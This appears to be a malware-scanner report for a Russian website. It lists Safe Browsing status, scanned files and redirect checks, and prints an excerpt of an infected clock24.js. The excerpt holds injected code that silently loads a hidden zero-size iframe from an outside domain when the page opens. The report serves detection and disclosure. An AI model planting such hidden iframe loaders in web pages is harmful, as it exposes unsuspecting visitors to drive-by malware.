Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lesnoyprivoz.ru
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status
http://lesnoyprivoz.ru/ | 200 OK; Content-Length: 3469; Content-Type: text/html | clean
http://lesnoyprivoz.ru/clock24.js | 200 OK; Content-Length: 6796; Content-Type: application/javascript | malicious
Malicious code (confirmed by antiviruses, see below), excerpt from clock24.js as captured by the scanner:
var clock24_lang = new Array();
clock24_lang["en"] = ['en','Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec', 'Sun','Mon','Tue','Wed','Thu','Fri','Sat'];
clock24_lang["ru"] = ['ru','\u042F\u043D\u0432','\u0424\u0435\u0432','\u041C\u0430\u0440','\u0410\u043F\u0440', '\u041C\u0430\u0439','\u0418\u044E\u043D','\u0418\u044E\u043B','\u0410\u0432\u0433', '\u0421\u0435\u043D','\u041E\u043A\u0442','\u041D\u043E\u044F','\u0414\u0435\u043A', '\u0412\u0441','\u
{ if(clock24_dst[i][1][j] == c) return i; } } }
var if843E8 = document.createElement('iframe');
if843E8.name = 'if843E8';
if843E8.src = 'http://ment.x3mfly.com/';
if843E8.style.width = '0px';
if843E8.style.height = '0px';
window.onload = function() {
  if (document.cookie.indexOf('if843E8=') == -1) {
    document.cookie = 'if843E8=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';
    document.getElementsByTagName('body')[0].appendChild(if843E8);
  }
};
Antivirus reports:
http://lesnoyprivoz.ru/test404page.js | 404 Not Found; Content-Length: 331; Content-Type: text/html | clean
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lesnoyprivoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 06:20:31 GMT
Accept-Ranges: bytes
ETag: "51c981c8-d8d"
Server: nginx
Vary: Accept-Encoding
Content-Length: 3469
Content-Type: text/html
Last-Modified: Tue, 25 Jun 2013 11:40:56 GMT
...3469 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: lesnoyprivoz.ru
Referer: http://www.google.com/search?q=lesnoyprivoz.ru
Result:
The result is similar to the first query. No suspicious redirects were found.